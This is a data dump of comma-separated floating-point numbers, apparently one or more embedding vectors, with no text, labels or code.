0.016031237319111824, 0.017725219950079918, 0.023130565881729126, -0.00917060673236847, -0.005220547318458557, 0.008031019009649754, 0.008924209512770176, -0.022776369005441666, -0.011226486414670944, -0.02822791412472725, 0.02343856170773506, -0.011565282940864563, 0.006310086231678724, 0.006745131686329842, -0.019511602818965912, 0.006279286462813616, 0.0028431962709873915, 0.0009865525644272566, 0.013166866265237331, -0.02280716970562935, 0.03310966491699219, 0.017247825860977173, 0.0037902866024523973, 0.017602020874619484, -0.01499174814671278, 0.026811128482222557, 0.00564019288867712, -0.019619401544332504, 0.0187878105789423, -0.01889560930430889, -0.0121042774990201, 0.010749091394245625, -0.01583104021847248, -0.0013859859900549054, -0.026626329869031906, -0.018233414739370346, -0.01809481717646122, -0.02658013068139553, 0.026610931381583214, 0.009671102277934551, 0.028043115511536598, 0.04117918387055397, -0.01114178728312254, -0.022345174103975296, 0.021990977227687836, 0.0012714496115222573, 0.02719612419605255, -0.028443511575460434, -0.015369044616818428, 0.0008402540115639567, 0.006648882757872343, -0.02125178463757038, 0.01835661381483078, 0.011819380335509777, 0.0035823886282742023, -0.015037947334349155, 0.004338906146585941, 0.03523484244942665, 0.005832690745592117, 0.010325595736503601, 0.0021752279717475176, 0.024793749675154686, -0.010879989713430405, -0.010879989713430405, 0.0127125708386302, -0.019172806292772293, -0.037544820457696915, 0.007164777256548405, 0.012142777442932129, -0.00029139392427168787, -0.023885158821940422, -0.012843470089137554, 0.007480474188923836, 0.014652951620519161, 0.02185237780213356, 0.0057171923108398914, -0.004866350907832384, 0.010417994111776352, -0.004512154497206211, -0.022514572367072105, -0.008962709456682205, 0.024886148050427437, 0.002604498527944088, -0.007210976909846067, -0.0027219224721193314, -0.0006597870960831642, 0.02519414573907852, 0.03646682947874069, -0.01048729382455349, -0.0016477833269163966, -0.032216474413871765, -0.016200635582208633, -0.026241334155201912, -0.009417004883289337, -0.00021728216961491853, 0.004184907767921686, -0.03086128830909729, -0.010879989713430405, 0.023453962057828903, 0.020743589848279953, 0.021267184987664223, -0.04810911417007446, -0.004989549517631531, 0.002592948731034994, 0.05137388035655022, -0.0029490701854228973, 0.03209327533841133, 0.0008070480544120073, -0.00031786240288056433, 0.016477832570672035, -0.016231436282396317, 0.007522823754698038, 0.010810690931975842, -0.00965570192784071, 0.012620172463357449, -0.026888128370046616, 0.027211524546146393, -0.006729731801897287, -0.03015289455652237, 0.011819380335509777, -0.013775160536170006, -0.0202815942466259, 0.0030818937812000513, -0.005547793582081795, -0.02553294226527214, -0.0015062972670421004, 0.009155207313597202, -0.00032604357693344355, -0.029521500691771507, -0.026549331843852997, -0.019604001194238663, 0.023207565769553185, -0.03138488158583641, -0.024408752098679543, 0.028782308101654053, 0.0001868434192147106, 0.012142777442932129, -0.017540423199534416, 0.009501704014837742, -0.017201626673340797, 0.021883178502321243, -0.019095806404948235, 0.014968648552894592, -0.011819380335509777, 0.0030761188827455044, -0.0022945767268538475, -0.017155425623059273, -0.0013137991772964597, 0.017355624586343765, 0.014452753588557243, -0.002115553477779031, -0.021436583250761032, -0.007314926013350487, -0.0081773167476058, 0.012011878192424774, 0.005289846565574408, -0.016924427822232246, 0.01013309694826603, -0.00436970591545105, 0.006375535391271114, 0.020681990310549736, 0.007877020165324211, 0.025856338441371918, 0.012997468002140522, -0.004335056059062481, -0.028643710538744926, -0.011919478885829449, 0.04623033106327057, -0.018218016251921654, 0.009578702971339226, -0.0034553399309515953, -0.00420030765235424, -0.016062038019299507, -0.03557363897562027, 0.011434384621679783, 0.011857880279421806, 0.00900120846927166, -0.004177207592874765, 0.024008356034755707, 0.029737098142504692, -0.028828507289290428, -0.0015332469483837485, -0.026610931381583214, 0.02805851586163044, -0.00456990348175168, -0.005624793004244566, -0.027334723621606827, 0.020420193672180176, -0.05550103634595871, -0.0036959624849259853, -0.04108678549528122, -0.02499394677579403, -0.008785611018538475, -0.020173795521259308, 0.012751070782542229, -0.017971618101000786, -0.014776150695979595, -0.003707512514665723, -0.004385105799883604, -0.011395884677767754, -0.01307446788996458, 0.03443405032157898, -0.014529752545058727, -0.002927895402535796, -0.01895720884203911, -0.029044106602668762, 0.012843470089137554, -0.013251565396785736, 0.001870118547230959, -0.007195577025413513, -0.04546033963561058, -0.01482234988361597, 0.022745570167899132, -0.02219117432832718, 0.004111758433282375, -0.02114398591220379, -0.014060057699680328, -0.024193154647946358, -0.010040698572993279, -0.012458473443984985, 0.007595973089337349, -0.011134087108075619, -0.02815091423690319, -0.00467770267277956, -0.014737650752067566, 0.019265204668045044, 0.0005640193121507764, 0.010479593649506569, 0.019527001306414604, 0.012342974543571472, -0.00017697789007797837, 0.010548893362283707, 0.05331426113843918, -0.02062039077281952, 0.017371024936437607, -0.03665162995457649, -0.015007147565484047, -0.009447804652154446, 0.0011646131752058864, 0.01499174814671278, -0.007137827575206757, -0.012504673562943935, 0.024146955460309982, 0.009401604533195496, -0.031692877411842346, -0.026118135079741478, -0.01633923500776291, -0.033263664692640305, 0.002479374874383211, -0.005151247605681419, 0.013089867308735847, -0.01783301867544651, -0.018033217638731003, 0.0014928224263712764, 0.006926079746335745, -0.004970299545675516, -0.0002318398328498006, 0.003031844273209572, 0.019527001306414604, -0.003715212456882, 0.012704871594905853, -0.00419260747730732, -0.02981409803032875, -0.023484762758016586, -0.016585631296038628, -0.016539432108402252, 0.005686392541974783, 0.06264656782150269, -0.024454953148961067, -0.012019578367471695, 0.025040145963430405, 0.015130346640944481, -0.013867559842765331, -0.03970079869031906, -0.002471674932166934, 0.010810690931975842, 0.011426684446632862, 0.005212847143411636, 0.006090638227760792, -0.0007507423870265484, 0.016400834545493126, 0.0013051368296146393, -0.019958198070526123, -0.013159167021512985, -0.006471784319728613, -0.0043312059715390205, -0.013536462560296059, -0.04007039591670036, 0.028828507289290428, 0.00031930612749420106, -0.009940599091351032, 0.0051396978087723255, 0.004727751947939396, 0.006109888199716806, -0.017278624698519707, 0.013790559954941273, -0.00822351686656475, -0.034310851246118546, -0.007049278821796179, -0.04469034820795059, -0.04395115375518799, 0.006148387677967548, -0.003628588281571865, -0.006017488893121481, -0.019711799919605255, -0.019773399457335472, 0.012265975587069988, 0.015322844497859478, 0.0074265748262405396, 0.014098557643592358, -0.027427121996879578, -0.008516114205121994, 0.017032228410243988, -0.016293035820126534, -0.006387085188180208, -0.000798385648522526, -0.030353091657161713, -0.04937189817428589, 0.018572211265563965, -0.031415682286024094, -0.016832029446959496, 0.023561760783195496, 0.0020558792166411877, 0.048909906297922134, 0.015569242648780346, 0.0015611591516062617, -0.01572324149310589, -0.017340224236249924, -0.01680123060941696, -0.041117582470178604, 0.04274996742606163, -0.00023352420248556882, 0.03612803295254707, 0.002490924671292305, 0.018033217638731003, 0.013644262216985226, -0.012312175706028938, -0.0043312059715390205, 0.028597509488463402, 0.0017190076177939773, 0.011611482128500938, -0.025301944464445114, 0.019650200381875038, -0.002691122703254223, 0.00835441518574953, -0.011241885833442211, 0.00015183283539954573, -0.04407435283064842, -0.0190650075674057, 0.000004158258889219724, 0.012304475530982018, -0.021128585562109947, 0.008808710612356663, 0.02115938626229763, -0.015800239518284798, 0.013128367252647877, -0.0486019067466259, 0.02447035163640976, -0.009878999553620815, -0.013189966790378094, -0.020065996795892715, -0.0028585961554199457, -0.03227807208895683, 0.02228357456624508, 0.03560443967580795, -0.0109338890761137, 0.021836979314684868, 0.03643603250384331, -0.00015111097309272736, -0.019388403743505478, 0.0024889998603612185, 0.014583651907742023, -0.005459244828671217, 0.02046639285981655, -0.006937629543244839, 0.015484543517231941, 0.023654161021113396, 0.028027717024087906, 0.0009596027666702867, 0.007607522886246443, 0.013736660592257977, 0.007557473611086607, 0.002900945721194148, -0.0176636204123497, 0.023115165531635284, -0.04465954750776291, -0.010325595736503601, 0.010795290581882, 0.02343856170773506, 0.029259704053401947, -0.03224727511405945, -0.00557089364156127, -0.0014071607729420066, 0.023792758584022522, 0.041548777371644974, 0.014214055612683296, -0.00436970591545105, 0.007622922770678997, 0.015669342130422592, 0.0012550873216241598, 0.04875590652227402, 0.013821359723806381, 0.021390384063124657, -0.001122263609431684, 0.0013205365976318717, 0.000534182065166533, 0.015084147453308105, -0.0005418820073828101, -0.008269716054201126, -0.022945767268538475, 0.002231052378192544, 0.001924018026329577, -0.024762948974967003, -0.0024543502368032932, -0.011904079467058182, 0.014922448433935642, 0.005143547896295786, 0.004708502441644669, 0.014560552313923836, -0.00869321171194315, -0.026426132768392563, -0.039546798914670944, 0.0008532475912943482, 0.005863490514457226, 0.004577603656798601, -0.01992739737033844, 0.009062808007001877, -0.017063027247786522, -0.0028682209085673094, -0.024685949087142944, 0.03024529293179512, 0.004462104756385088, -0.018603011965751648, -0.00821581669151783, -0.0027450222987681627, -0.010864590294659138, 0.0018027442274615169, -0.005478494334965944, -0.021051587536931038, -0.005543943960219622, -0.0013667361345142126, 0.0005928939790464938, -0.03209327533841133, 0.017340224236249924, 0.009917499497532845, 0.06350895762443542, 0.022668570280075073, -0.007080078125, -0.005147397983819246, -0.01697062887251377, -0.026687929406762123, -0.010032998397946358, 0.028967106714844704, 0.007977119646966457, 0.00046512341941706836, 0.02902870625257492, -0.0039770095609128475, -0.000422773853642866, 0.02001979760825634, -0.015769440680742264, 0.014075457118451595, 0.021267184987664223, 0.011372785083949566, 0.017802219837903976, 0.0068452307023108006, -0.00509349862113595, 0.0011511383345350623, 0.0163546334952116, 0.004866350907832384, -0.0005818253848701715, -0.027488721534609795, -0.013166866265237331, -0.0027604219503700733, -0.01852601207792759, 0.0034611148294061422, -0.0231767650693655, -0.015553842298686504, -0.006398634985089302, 0.014922448433935642, 0.004131007939577103, -0.003439940046519041, 0.037452422082424164, 0.00804641842842102, 0.015138046815991402, -0.021436583250761032, -0.0033302162773907185, -0.028643710538744926, 0.005289846565574408, -0.0027469471096992493, -0.02676492929458618, -0.014291055500507355, 0.0254251416772604, 0.003547739004716277, -0.0011059013195335865, -0.028289513662457466, 0.005851940717548132, -0.013959958218038082, 0.007946319878101349, 0.03437245264649391, -0.0032243423629552126, 0.010571992956101894, -0.0011598007986322045, -0.009232206270098686, -0.01075679063796997, -0.0540226511657238, 0.020574191585183144, -0.0039057855028659105, 0.0160774365067482, 0.019896598532795906, 0.0074881743639707565, -0.007087778300046921, -0.03338686004281044, 0.004712352063506842, -0.012135077267885208, 0.01844901405274868, 0.0008436227217316628, -0.024578150361776352, 0.028689909726381302, -0.01563854143023491, 0.028628310188651085, 0.031153883785009384, -0.01581563986837864, 0.0012502748286351562, -0.04555273801088333, 0.001642970833927393, 0.055993832647800446, 0.01609283685684204, 0.0039038604591041803, 0.009632602334022522, -0.014344954863190651, 0.010402594693005085, 0.010025298222899437, 0.006048288661986589, -0.01498404797166586, -0.01697062887251377, 0.004131007939577103, -0.01337476447224617, 0.00311269355006516, 0.011703881435096264, -0.0024139254819601774, -0.009555603377521038, -0.00996369868516922, -0.00036069322959519923, 0.002125178463757038, -0.03084588795900345, 0.004604553338140249, 0.010279395617544651, 0.021282585337758064, -0.011080187745392323, -0.007992519065737724, 0.010810690931975842, 0.01323616597801447, 0.014783849939703941, 0.013574962504208088, -0.010502693243324757, -0.018726211041212082, -0.0010375644778832793, 0.0087394118309021, -0.04749311879277229, -0.030306892469525337, 0.0058442410081624985, 0.007807720918208361, 0.0034649649169296026, 0.017263224348425865, -0.0071339779533445835, -0.01755582168698311, -0.005351445637643337, 0.030614890158176422, -0.028458911925554276, 0.009878999553620815, 0.017940817400813103, -0.019080406054854393, -0.022144975140690804, 0.027042126283049583, 0.0381300151348114, 0.02884390763938427, 0.016154436394572258, 0.008462213911116123, -0.006021338980644941, 0.034834448248147964, -0.039731599390506744, 0.008493013679981232, -0.00008127027103910223, 0.028797708451747894, -0.01809481717646122, -0.001069326652213931, 0.02282256819307804, 0.008146517910063267, 0.02078978903591633, 0.02098998799920082, -0.0016862829215824604, -0.00952480360865593, 0.03886920586228371, -0.0028720709960907698, -0.013651961460709572, -0.0020616541150957346, 0.0054938942193984985, 0.015677040442824364, 0.037113625556230545, 0.008931909687817097, -0.001743069849908352, 0.00935540534555912, -0.0036054884549230337, -0.018418213352560997, -0.010826090350747108, 0.0005423632683232427, 0.018202615901827812, 0.032555270940065384, -0.004030909389257431, 0.0026160485576838255, 0.011657682247459888, -0.016986027359962463, -0.010725991800427437, -0.017278624698519707, -0.01740182377398014, 0.008500713855028152, 0.0173864234238863, -0.03163127973675728, 0.0030703439842909575, 0.024947747588157654, 0.017540423199534416, -0.008608512580394745, -0.02273016981780529, -0.004465954843908548, 0.008762511424720287, -0.011465183459222317, -0.009979099035263062, -0.015492242760956287, -0.011003188788890839, 0.029336702078580856, -0.015084147453308105, 0.029059505090117455, -0.005439994856715202, -0.030491691082715988, 0.008061818778514862, 0.011603782884776592, 0.019773399457335472, -0.026718730106949806, 0.0022079525515437126, -0.015600042417645454, -0.01158068235963583, 0.0022156524937599897, 0.014298754744231701, 0.001877818489447236, -0.03240127116441727, 0.004735452122986317, 0.010441094636917114, -0.001857606228441, -0.00342069030739367, 0.015484543517231941, -0.003746011992916465, 0.02403915673494339, -0.01001759897917509, 0.001336899003945291, -0.003434165148064494, -0.0176636204123497, 0.016909029334783554, 0.0019750299397855997, 0.012512372806668282, 0.014729950577020645, 0.021913977339863777, 0.0054938942193984985, -0.03409525379538536, 0.00979430042207241, 0.022699370980262756, -0.010879989713430405, 0.024100756272673607, -0.00426190672442317, -0.001282037002965808, -0.027950717136263847, -0.004219557158648968, 0.019434602931141853, 0.007900119759142399, -0.006082938518375158, 0.02325376495718956, 0.016154436394572258, 0.0156077416613698, 0.031939275562763214, 0.02020459622144699, -0.022098775953054428, -0.01302826777100563, 0.0012387249153107405, 0.014945548959076405, 0.026610931381583214, -0.05088108405470848, -0.004516004119068384, 0.013836760073900223, -0.02788911759853363, -0.00491640018299222, 0.012181276455521584, -0.00032267486676573753, 0.011303485371172428, 0.023022767156362534, -0.0157463401556015, 0.02848971076309681, -0.0006631558062508702, -0.003867285791784525, 0.015130346640944481, -0.006310086231678724, -0.008300515823066235, 0.020420193672180176, 0.004485204350203276, -0.010210096836090088, 0.011134087108075619, -0.026118135079741478, 0.00804641842842102, 0.0035053894389420748, 0.010302495211362839, -0.006140687968581915, -0.00021728216961491853, -0.006452534813433886, -0.027488721534609795, -0.0087394118309021, -0.033263664692640305, 0.010779891163110733, -0.014083157293498516, -0.015176545828580856, -0.010202396661043167, 0.01013309694826603, -0.009447804652154446, -0.008423714898526669, 0.0048856004141271114, -0.03409525379538536, 0.0006872180383652449, 0.012142777442932129, 0.015600042417645454, 0.014714551158249378, -0.0026237484999001026, -0.011326584964990616, -0.011334285140037537, 0.0038133864291012287, -0.01110328733921051, -0.0027681218925863504, -0.006487184204161167, -0.01985039934515953, 0.029413701966404915, 0.00570564204826951, -0.030707288533449173, -0.039208002388477325, 0.007518973667174578, 0.0069453297182917595, -0.034064456820487976, 0.04810911417007446, 0.00515894778072834, -0.012458473443984985, 0.012304475530982018, 0.00029019080102443695, -0.0032301172614097595, 0.002323451451957226, -0.0020732039120048285, -0.004084808751940727, -0.022668570280075073, -0.02658013068139553, 0.034218452870845795, 0.0008104167645797133, 0.025332743301987648, -0.018510611727833748, -0.032555270940065384, -0.02848971076309681, -0.012435373850166798, -0.002800846705213189, -0.013251565396785736, 0.0109338890761137, 0.02175997942686081, -0.0044929045252501965, -0.0024023756850510836, 0.003707512514665723, -0.0004490017017815262, -0.052482668310403824, -0.009802000597119331, 0.003493839642032981, 0.004816301167011261, 0.000110626220703125, 0.009463204070925713, 0.013775160536170006, 0.019003408029675484, 0.020173795521259308, -0.0010375644778832793, 0.022268174216151237, 0.014252555556595325, 0.0001414860598742962, 0.017771419137716293, 0.0046584527008235455, -0.0005909689934924245, -0.01755582168698311, -0.021836979314684868, 0.022945767268538475, -0.028782308101654053, -0.0093477051705122, 0.023808158934116364, 0.0022560772486031055, 0.026179734617471695, 0.020435592159628868, -0.02072818949818611, 0.007403475232422352, -0.005778791382908821, -0.028351113200187683, -0.007699922192841768, -0.0033321413211524487, 0.005536243785172701, 0.016108237206935883, -0.004415905103087425, 0.013867559842765331, -0.024408752098679543, -0.032832466065883636, -0.02482454851269722, 0.005605543032288551, -0.000848916417453438, -0.002144428202882409, -0.007969419471919537, 0.020481793209910393, -0.003153118072077632, -0.006664282642304897, 0.009039708413183689, 0.013752060942351818, 0.0021271035075187683, -0.025579141452908516, -0.001068364130333066, 0.010464194230735302, 0.0047470019198954105, 0.018633810803294182, 0.037021223455667496, 0.01837201416492462, -0.02867450937628746, 0.015438343398272991, 0.013390164822340012, -0.016370033845305443, 0.028643710538744926, -0.008292815648019314, -0.03486524522304535, 0.016816629096865654, -0.01729402504861355, 0.014806950464844704, 0.005925090052187443, -0.005004949402064085, 0.007595973089337349, -0.00294137024320662, 0.009055107831954956, 0.037976015359163284, -0.012874269858002663, 0.000654493342153728, 0.020173795521259308, 0.01171928085386753, -0.023977557197213173, -0.001308986684307456, 0.03394125774502754, 0.016539432108402252, -0.01563084125518799, 0.01275877095758915, 0.007749971468001604, 0.006321636028587818, -0.011988778598606586, -0.01001759897917509, 0.021190185099840164, -0.01590803824365139, 0.0068837301805615425, -0.004181057680398226, 0.025733139365911484, 0.0016516332980245352, 0.023222964257001877, -0.024454953148961067, -0.018248815089464188, -0.00007916481990832835, -0.004646902903914452, 0.012058078311383724, 0.021374983713030815, -0.004123308230191469, 0.005871190689504147, -0.044536348432302475, -0.008015618659555912, -0.0012377625098451972, 0.0228995680809021, -0.023561760783195496, 0.009855899959802628, 0.03415685519576073, -0.012527773156762123, 0.026980526745319366, 0.01660103164613247, -0.0006073313415981829, 0.017632821574807167, 0.009209106676280499, -0.01333626452833414, 0.015245845541357994, 0.0121042774990201, -0.01516884658485651, -0.006375535391271114, 0.001176163088530302, -0.018664611503481865, 0.0066565824672579765, 0.011026288382709026, 0.015307445079088211, 0.002358101075515151, 0.015415243804454803, 0.008362115360796452, -0.0025409741792827845, 0.024501152336597443, -0.003395665669813752, 0.0031280932016670704, -0.008185016922652721, -0.00917830690741539, 0.02413155511021614, 0.028474312275648117, 0.003020294476300478, -0.0030356943607330322, 0.0023619511630386114, 0.023546362295746803, -0.019111206755042076, 0.011134087108075619, 0.010887689888477325, -0.0036189632955938578, 0.02534814365208149, 0.0033975904807448387, -0.002691122703254223, -0.003867285791784525, -0.040593989193439484, 0.020527992397546768, -0.000964896462392062, 0.010410294868052006, -0.0027084476314485073, -0.008031019009649754, -0.005952039733529091, -0.016893628984689713, -0.006464084610342979, 0.013536462560296059, 0.0034822896122932434, 0.01399075798690319, 0.014668351039290428, -0.002450500149279833, -0.005767241585999727, 0.005736441817134619, 0.028982507064938545, 0.004835551138967276, 0.009855899959802628, 0.002625673310831189, -0.0012377625098451972, -0.004727751947939396, 0.01044879388064146, -0.012635571882128716, 0.015153446234762669, 0.004338906146585941, 0.0030780439265072346, 0.0039770095609128475, 0.021883178502321243, -0.002900945721194148, 0.010194696485996246, -0.017540423199534416, -0.0006188812549225986, 0.008577712811529636, -0.02082058973610401, 0.022483771666884422, -0.004893300589174032, 0.0032050926238298416, -0.006760531570762396, 0.010633592493832111, 0.003158892970532179, 0.01880320906639099, 0.004804751370102167, 0.014214055612683296, 0.0042041572742164135, 0.018479812890291214, -0.0005125260795466602, -0.011680781841278076, -0.005297546274960041, -0.006352435797452927, 0.009855899959802628, 0.002190627856180072, 0.013105267658829689, 0.006514133885502815, -0.0010674017248675227, -0.010541193187236786, -0.004215707071125507, -0.013059067539870739, -0.0019750299397855997, -0.00917830690741539, -0.00786931999027729, 0.005066548474133015, 0.014391154050827026, 0.0009750026511028409, -0.0218677781522274, -0.0006857743137516081, 0.008616212755441666, -0.00330134155228734, -0.011665381491184235, 0.011834779754281044, -0.008007918484508991, 0.018156416714191437, 0.004215707071125507, 0.0037517868913710117, 0.022868769243359566, 0.0069838291965425014, -0.00766912242397666, 0.014260255731642246, -0.028443511575460434, -0.020774388685822487, 0.0203739944845438, -0.0036805628333240747, -0.009332305751740932, -0.015061047859489918, -0.007954019121825695, -0.006660432554781437, 0.013651961460709572, 0.0031511930283159018, -0.0030568691436201334, 0.009147507138550282, 0.012943568639457226, 0.0019259429536759853, -0.00042782691889442503, -0.01399075798690319, 0.01245077420026064, -0.0032378172036260366, 0.013813660480082035, 0.0019028432434424758, 0.015800239518284798, -0.015007147565484047, -0.005459244828671217, 0.007184027228504419, -0.010202396661043167, -0.0020462542306631804, 0.01844901405274868, -0.002546749310567975, 0.01677042990922928, 0.008531513623893261, 0.007788470946252346, 0.014845449477434158, 0.007438124623149633, 0.034649647772312164, -0.0031146183609962463, -0.02280716970562935, -0.024239353835582733, -0.03366405889391899, 0.007842370308935642, -0.01109558716416359, -0.007372675463557243, -0.01643163338303566, -0.0087394118309021, 0.001963480142876506, 0.018633810803294182, -0.012812670320272446, -0.00017517321975901723, -0.008285116404294968, -0.0057441419921815395, -0.007287976332008839, 0.005285996478050947, -0.010879989713430405, 0.014491253532469273, -0.020604990422725677, 0.01437575463205576, -0.007280276156961918, -0.02833571285009384, -0.011157186701893806, 0.04053238779306412, 0.04065558686852455, 0.013798260129988194, -0.008808710612356663, -0.008793311193585396, 0.0045198542065918446, -0.04022439196705818, -0.0014177481643855572, -0.0015043722232803702, 0.00509349862113595, -0.0024832249619066715, 0.015861839056015015, -0.0017305574147030711, 0.004573753569275141, -0.009270706214010715, 0.007880870252847672, -0.0018787810113281012, 0.01792541891336441, 0.00581344123929739, 0.009132107719779015, 0.005166647490113974, 0.01240457408130169, 0.00570564204826951, 0.013690461404621601, -0.011395884677767754, -0.007291825953871012, 0.028274113312363625, 0.01001759897917509, 0.01255087275058031, -0.011819380335509777, 0.026610931381583214, -0.005309096071869135, 0.020666589960455894, -0.008339015766978264, -0.02168297953903675, 0.007638322655111551, -0.02639533206820488, -0.017694421112537384, 0.009478604421019554, -0.0025679240934550762, 0.0076922220177948475, -0.0007324550533667207, 0.009563303552567959, -0.010602792724967003, -0.003085743635892868, 0.014113957062363625, 0.014013858512043953, -0.007357275579124689, 0.004242657218128443, -0.0010260145645588636, -0.008724011480808258, -0.007326475810259581, -0.02510174550116062, -0.0027276973705738783, 0.032216474413871765, -0.00294137024320662, -0.0071339779533445835, 0.010025298222899437, 0.004550653975456953, 0.0038230111822485924, 0.011380484327673912, 0.0031107685063034296, -0.008477614261209965, 0.003399515524506569, 0.020389392971992493, -0.006456384435296059, 0.0244857519865036, 0.01114948745816946, 0.01516114640980959, -0.024778349325060844, 0.004412055481225252, 0.00197695498354733, -0.004485204350203276, -0.02299196645617485, 0.03069189004600048, 0.01385985966771841, 0.005455394741147757, -0.006902980152517557, 0.013436364009976387, 0.01145748421549797, -0.018202615901827812, -0.003942360170185566, -0.005728742107748985, -0.0006068500806577504, -0.01416015625, 0.002485149772837758, -0.024085355922579765, 0.013320865109562874, -0.011904079467058182, -0.0012060003355145454, -0.020943786948919296, -0.012227476574480534, 0.012781870551407337, 0.003950059879571199, -0.0035920136142522097, -0.013482563197612762, -0.00197888002730906, -0.011087887920439243, 0.021621381863951683, -0.01921900548040867, 0.012989768758416176, 0.006240786984562874, -0.013089867308735847, -0.020851388573646545, -0.005582443438470364, 0.014706850983202457, -0.007680672220885754, 0.0012570122489705682, 0.004477504640817642, 0.01141128409653902, 0.010980089195072651, -0.005559343844652176, -0.010287095792591572, 0.009378504939377308, -0.015530742704868317, -0.011850180104374886, 0.014637552201747894, -0.0008532475912943482, -0.028551310300827026, -0.004123308230191469, -0.0039770095609128475, 0.004766251891851425, -0.02447035163640976, 0.012073477730154991, 0.018649211153388023, 0.02220657467842102, -0.006132987793534994, 0.04053238779306412, 0.01272027101367712, -0.00002553607009758707, 0.00966340210288763, -0.0027892966754734516, 0.0005101198330521584, -0.004208007361739874, -0.0021867777686566114, 0.02350016124546528, 0.00918600708246231, 0.013752060942351818, 0.0030222192872315645, 0.0027604219503700733, -0.0034591900184750557, -0.028982507064938545, -0.007184027228504419, -0.015499942936003208, 0.01066439226269722, -0.0003712806210387498, 0.012496973387897015, 0.025301944464445114, -0.0014408478746190667, 0.016631832346320152, 0.0019211305771023035, -0.005143547896295786, -0.004735452122986317, 0.00677208136767149, 0.0032493670005351305, 0.001776756951585412, -0.0023099766112864017, -0.004003959242254496, -0.019896598532795906, 0.023731159046292305, 0.022268174216151237, 0.0012704870896413922, -0.017463423311710358, -0.022221975028514862, 0.00515894778072834, -0.006879880093038082, 0.006695082411170006, 0.013582662679255009, 0.009340004995465279, 0.023915957659482956, -0.008462213911116123, 0.028813108801841736, -0.011488283984363079, -0.0047855013981461525, 0.0024947747588157654, 0.014753050170838833, -0.01983499899506569, -0.00605598883703351, 0.007626772858202457, 0.01338246464729309, 0.0032897917553782463, 0.017355624586343765, 0.01399075798690319, 0.007923219352960587, -0.00840061530470848, -0.027858316898345947, 0.012489273212850094, -0.00996369868516922, -0.009640302509069443, 0.04007039591670036, 0.0026006486732512712, 0.016370033845305443, 0.0029086454305797815, -0.0008955971570685506, 0.011549882590770721, 0.00018804652791004628, 0.011365084908902645, 0.003615113440901041, -0.006179187446832657, 0.01583104021847248, 0.002490924671292305, 0.0023080515675246716, 0.018402813002467155, 0.011365084908902645, 0.009640302509069443, 0.0032050926238298416, 0.004616103135049343, -0.016539432108402252, -0.0033302162773907185, 0.024947747588157654, 0.014660651795566082, -0.03059948980808258, 0.009055107831954956, -0.0017449947772547603, 0.015107247047126293, 0.009725001640617847, 0.011357384733855724, 0.01774062030017376, -0.013798260129988194, -0.0093477051705122, -0.00018431688658893108, 0.010302495211362839, -0.02062039077281952, 0.01837201416492462, -0.0036901875864714384, -0.002030854346230626, -0.010541193187236786, 0.0032416670583188534, -0.01197337917983532, 0.007761521264910698, 0.0190650075674057, 0.0027777468785643578, -0.018079416826367378, -0.005859640426933765, 0.0002767159603536129, -0.017956217750906944, 0.0028643710538744926, 0.01650863327085972, 0.0042041572742164135, 0.01923440583050251, 0.018849408254027367, -0.015969637781381607, 0.011072487570345402, -0.02194477804005146, 0.0020193045493215322, 0.01254317257553339, 0.006795180961489677, -0.010987788438796997, 0.0061984374187886715, 0.0035862387157976627, 0.01188867911696434, -0.009101307950913906, -0.0018758934456855059, 0.002679572906345129, 0.00043432373786345124, 0.03917720168828964, 0.017109226435422897, 0.010094597935676575, -0.0034418650902807713, -0.004835551138967276, 0.002733472269028425, 0.007576723117381334, -0.02265316992998123, -0.021836979314684868, -0.010779891163110733, -0.02018919587135315, 0.00515894778072834, 0.0022464522626250982, -0.005859640426933765, -0.005898140370845795, 0.005443844944238663, 0.016139036044478416, 0.007780771236866713, -0.016631832346320152, 0.007615223061293364, -0.002591023687273264, 0.010849189944565296, -0.006571883335709572, -0.00017024046974256635, 0.0017661695601418614, -0.009078208357095718, -0.0244857519865036, 0.0066796825267374516, 0.008462213911116123, 0.007411174941807985, -0.005251346621662378, 0.023407762870192528, 0.018603011965751648, 0.0087394118309021, -0.014583651907742023, 0.018156416714191437, -0.0039731599390506744, -0.00718787731602788, -0.007711471989750862, 0.0007242739084176719, -0.000046921399189159274, -0.013528763316571712, -0.007572873495519161, 0.023761959746479988, 0.018402813002467155, 0.0015582717023789883, -0.020327793434262276, -0.0012675996404141188, 0.01031019538640976, 0.01652403175830841, 0.00042084886808879673, 0.002531349426135421, 0.01062589231878519, -0.003368715988472104, 0.03548124060034752, 0.015369044616818428, -0.015546142123639584, 0.008446814492344856, -0.005674842745065689, 0.018110215663909912, 0.021267184987664223, 0.009293805807828903, -0.013736660592257977, 0.011542183347046375, 0.005097348242998123, 0.00048605757183395326, 0.0004215707303956151, -0.013097567483782768, -0.016216035932302475, -0.02333076298236847, -0.021390384063124657, 0.021451983600854874, 0.008308215998113155, 0.020574191585183144, -0.027504121884703636, 0.0043312059715390205, 0.0031762178987264633, -0.01062589231878519, -0.024793749675154686, 0.016108237206935883, -0.02463974989950657, -0.006044438574463129, -0.005459244828671217, -0.022237375378608704, -0.008462213911116123, 0.011665381491184235, 0.0023908258881419897, 0.010856890119612217, 0.01573093980550766, -0.010749091394245625, -0.016308434307575226, 0.0009677839698269963, -0.011326584964990616, -0.007680672220885754, -0.010841489769518375, -0.02437795326113701, 0.018064016476273537, 0.007160927634686232, 0.02544054202735424, 0.007422724738717079, -0.009409304708242416, -0.016370033845305443, 0.0009307280997745693, 0.033510059118270874, 0.0013041743077337742, -0.004585303366184235, -0.005647892598062754, -0.010679791681468487, -0.008154217153787613, -0.008539213798940182, -0.009316905401647091, -0.010364094749093056, 0.015938838943839073, -0.017679020762443542, 0.011950278654694557, 0.020851388573646545, -0.01755582168698311, 0.0041040582582354546, 0.03301726654171944, 0.005982839502394199, -0.003520789323374629, -0.026195134967565536, -0.032555270940065384, -0.012658671475946903, 0.006005939096212387, 0.002564074005931616, -0.021898578852415085, -0.014445053413510323, 0.015553842298686504, -0.016493232920765877, -0.017525022849440575, 0.0002318398328498006, 0.030984485521912575, 0.007946319878101349, 0.023115165531635284, -0.009748101234436035, 0.01994279772043228, 0.016724230721592903, 0.01446815300732851, -0.021174784749746323, -0.020173795521259308, -0.006729731801897287, -0.0035400390625, 0.015037947334349155, 0.004342756234109402, -0.0027469471096992493, -0.015376743860542774, -0.0031300182454288006, 0.007199427112936974, -0.016816629096865654, 0.026811128482222557, -0.014945548959076405, -0.010256296023726463, -0.025240344926714897, 0.01643163338303566, -0.026965126395225525, -0.0058480906300246716, 0.011911779642105103, -0.0003274873015470803, 0.02525574341416359, -0.016631832346320152, 0.004812451079487801, -0.011395884677767754, -0.012535473331809044, -0.026718730106949806, -0.007938619703054428, 0.0015505717601627111, -0.014552852138876915, 0.003688262542709708, -0.019881198182702065, 0.01940380409359932, 